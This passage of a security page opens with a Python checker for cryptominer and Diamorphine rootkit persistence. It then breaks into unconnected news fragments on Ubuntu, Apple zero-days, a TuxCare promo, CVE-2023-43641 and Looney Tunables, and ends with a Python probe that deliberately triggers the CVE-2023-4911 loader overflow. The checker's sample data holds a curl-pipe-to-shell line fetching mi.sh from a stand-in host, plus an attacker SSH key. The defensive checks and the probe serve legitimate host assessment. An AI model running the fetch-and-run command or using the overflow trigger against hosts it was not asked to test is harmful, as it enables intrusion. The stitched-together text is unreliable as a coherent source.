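        pid, user, cmd = parts
        if os.path.basename(cmd.split()[0]) in MINER_PROCESS_NAMES:
            findings.append({"check": "miner_process", "where": f"pid {pid} ({user})", "detail": cmd})

    # 2. Cron persistence: the job names mi.sh uses, or jobs that fetch/run from tmp.
    for source, text in snapshot["cron"].items():
        for line in text.splitlines():
            if not line.strip() or line.lstrip().startswith("#"):
                continue
            names = {os.path.basename(source)} | {os.path.basename(tok) for tok in line.split()}
            if names & SUSPECT_CRON_NAMES or DOWNLOADER_RE.search(line):
                findings.append({"check": "cron_persistence", "where": source, "detail": line})

    # 3. SSH keys not in the operator's baseline (compare the key blob, not the comment).
    for path, text in snapshot["authorized_keys"].items():
        for line in text.splitlines():
            fields = line.split()
            # Assumes no leading option string (command="..." etc.); extend if your fleet uses them.
            if len(fields) >= 2 and fields[0].startswith(("ssh-", "ecdsa-", "sk-")):
                if fields[1] not in known_key_blobs:
                    findings.append({"check": "unknown_ssh_key", "where": path, "detail": line})

    # 4. Rootkit module visible in /proc/modules. Diamorphine unlinks itself from the
    #    module list, so an empty result here proves nothing; toggling its visibility
    #    (it reacts to signal 63) and re-reading /proc/modules is the manual follow-up.
    for line in snapshot["modules"].splitlines():
        mod = line.split()[0] if line.split() else ""
        if mod in ROOTKIT_MODULES:
            findings.append({"check": "rootkit_module", "where": "/proc/modules", "detail": line})

    # 5. Startup files: rc*, profile, bashrc, inittab, systemd units, autostart .desktop files.
    for path, text in snapshot["startup"].items():
        for line in text.splitlines():
            if DOWNLOADER_RE.search(line):
                findings.append({"check": "startup_downloader", "where": path, "detail": line})
    return findings

def collect_live():
    """Build a snapshot from the running host; run as root to be able to read everything."""
    def read(p):
        try:
            with open(p) as fh:
                return fh.read()
        except OSError:
            return ""
    startup = ["/etc/rc.local", "/etc/inittab", "/etc/profile", "/root/.bashrc"]
    startup += glob.glob("/etc/rc*.d/*") + glob.glob("/etc/systemd/system/*.service")
    startup += glob.glob("/root/.config/autostart/*.desktop") + glob.glob("/home/*/.config/autostart/*.desktop")
    return {
        "ps": subprocess.run(["ps", "-eo", "pid,user,args"], capture_output=True, text=True).stdout,
        "cron": {p: read(p) for p in glob.glob("/etc/cron.d/*") + glob.glob("/var/spool/cron/*/*")},
        "authorized_keys": {p: read(p) for p in glob.glob("/root/.ssh/authorized_keys") + glob.glob("/home/*/.ssh/authorized_keys")},
        "modules": read("/proc/modules"),
        "startup": {p: read(p) for p in startup},
    }

# Constructed snapshot (not real host data) showing each indicator once or twice.
GOOD_BLOB = "AAAAC3NzaC1lZDI1NTE5AAAAIMadeUpBaselineKeyForThisExample00000000000"
SAMPLE_SNAPSHOT = {
    "ps": "    PID USER     COMMAND\n"
          "      1 root     /sbin/init\n"
          "   2231 root     /var/tmp/.x/python-dev -o pool.example.invalid:3333 -B\n"
          "   2240 root     /usr/sbin/sshd -D\n",
    "cron": {
        "/etc/cron.d/apache2": "*/5 * * * * root /var/tmp/.x/mi.sh >/dev/null 2>&1\n",
        "/var/spool/cron/crontabs/root": "0 3 * * * /usr/local/bin/backup.sh\n*/10 * * * * /var/tmp/.x/netns\n",
    },
    "authorized_keys": {
        "/root/.ssh/authorized_keys": f"ssh-ed25519 {GOOD_BLOB} admin@bastion\n"
                                      "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDMadeUpAttackerKey attacker\n",
    },
    "modules": "ext4 778240 1 - Live 0xffffffffc0200000\ndiamorphine 16384 0 - Live 0xffffffffc0100000 (OE)\n",
    "startup": {
        "/etc/rc.local": "#!/bin/sh\ncurl -s http://203.0.113.10/mi.sh | sh\nexit 0\n",
        "/root/.bashrc": "alias ll='ls -la'\n",
    },
}

if __name__ == "__main__":
    for f in analyze(SAMPLE_SNAPSHOT, {GOOD_BLOB}):
        print(f"[{f['check']}] {f['where']}: {f['detail']}")
```

On a real host run `analyze(collect_live(), baseline)` where `baseline` is the set of key blobs your configuration management actually deploys; anything else in authorized_keys is a finding by definition, which is a far more reliable test than pattern-matching key comments. Treat a clean module check as inconclusive for the reason given in the comment, and pull the snapshot from a trusted live-response toolkit or an offline image if the rootkit is suspected, since Diamorphine also hides processes from `ps`.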
Furthermore, dependencies, code, and open source components may undergo a separate validation process, aimed at thwarting malware, than the one suited for translations, making incidents like these harder to discover. "I trust Ubuntu because it's the most widely used so it should have the best review team, but if this happened with translations and no one saw, imagine with dependencies with malware injected," posted a user on X (formerly Twitter).
The list of devices impacted by the two zero-day bugs is extensive, and it includes: iPhone 8 and later; iPad Pro (all models); iPad Air 3rd generation and later; iPad 5th generation and later; and iPad mini 5th generation and later. CISA added the two vulnerabilities to its Known Exploited Vulnerabilities Catalog last week, ordering federal agencies to secure their devices against incoming attacks.

TuxCare has unveiled the addition of a new Extended Security Update (ESU) service for its Enterprise Support Service line up for AlmaLinux OS. The new ESU service enhances TuxCare’s comprehensive service portfolio for AlmaLinux OS, enabling organizations to achieve greater stability and predictability for their AlmaLinux systems. All services in the portfolio, including the newly announced ESU service as well as Essential Support, Live Patching, and Enhanced Support, are now offered to customers as a … More
The post TuxCare adds ESU service for stability and predictability in AlmaLinux systems appeared first on Help Net Security.
"Vulnerabilities like this are often the starting point for a 'one-click' exploit, which compromises the victim's device when they visit a malicious website," security researcher Man Yue Mo said.
While successful exploitation of CVE-2023-43641 requires tricking a potential victim into downloading a .cue file, admins are advised to patch systems and mitigate the risks posed by this security flaw, as it provides code execution on devices running the latest releases of widely used Linux distros, including Debian, Fedora, and Ubuntu.

A vulnerability (CVE-2023-4911) in the GNU C Library (aka “glibc”) can be exploited by attackers to gain root privileges on many popular Linux distributions, according to Qualys researchers. About CVE-2023-4911: Dubbed “Looney Tunables”, CVE-2023-4911 is a buffer overflow vulnerability in the dynamic loader’s processing of the GLIBC_TUNABLES environment variable. To exploit it, attackers first need to establish access to the system. “The GNU C Library, commonly known as glibc, is the C library in the … More
The post “Looney Tunables” bug allows root access on Linux distros (CVE-2023-4911) appeared first on Help Net Security.
"Our successful exploitation, leading to full root privileges on major distributions like Fedora, Ubuntu, and Debian, highlights this vulnerability’s severity and widespread nature," said Saeed Abbasi, Product Manager at Qualys' Threat Research Unit.
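A practitioner reading the Looney Tunables item wants a way to tell whether a given host's loader is still affected. The Qualys advisory (not reproduced on this page) gives a harmless one-liner for that: run a set-user-ID program with a clean environment and a doubled tunable name, and a vulnerable ld.so dies with SIGSEGV while a patched one just prints the program's help. The wrapper below is an added example of mine, not Qualys' or the page's code; it assumes /usr/bin/su is present (any set-uid binary would do, and the probe targets one because the overflowing copy only runs on the loader's set-uid code path).

```python
import subprocess

# Probe from the Qualys advisory for CVE-2023-4911, originally a shell one-liner:
#   env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" \
#          "Z=`printf '%08192x' 1`" /usr/bin/su --help
# The doubled tunable name makes a vulnerable ld.so overflow its copy buffer
# while rewriting GLIBC_TUNABLES for a set-user-ID program, so the process dies
# with SIGSEGV; a patched loader lets su print its help text and exit 0.
SU = "/usr/bin/su"   # assumption: any set-uid binary works, su exists on the distros listed above

PROBE_ENV = {
    "GLIBC_TUNABLES": "glibc.malloc.mxfast=glibc.malloc.mxfast=A",
    "Z": "%08192x" % 1,   # 8192 hex digits, identical to printf '%08192x' 1
}

def classify(returncode):
    """Map the probe's exit status to a verdict; subprocess reports 'killed by SIGSEGV' as -11."""
    if returncode == -11:
        return "vulnerable"
    if returncode == 0:
        return "not-vulnerable"
    return "unknown"          # e.g. a su build whose --help exits non-zero

def probe(binary=SU):
    """Run the probe with a clean environment (env= replaces the environment entirely, like env -i)."""
    try:
        result = subprocess.run([binary, "--help"], env=PROBE_ENV, capture_output=True, timeout=10)
    except (FileNotFoundError, PermissionError, subprocess.TimeoutExpired):
        return "unknown"
    return classify(result.returncode)

if __name__ == "__main__":
    print(f"{SU}: {probe()}")
```

The probe exercises the bug without any attempt at code execution, so it is safe to run on production hosts; a "vulnerable" verdict means the distribution's patched glibc has not actually been installed (or the host has not been rebooted into it where the loader was updated in place), and a "not-vulnerable" verdict still says nothing about other set-uid programs beyond the one probed, which is fine because the flaw is in the shared loader, not in su.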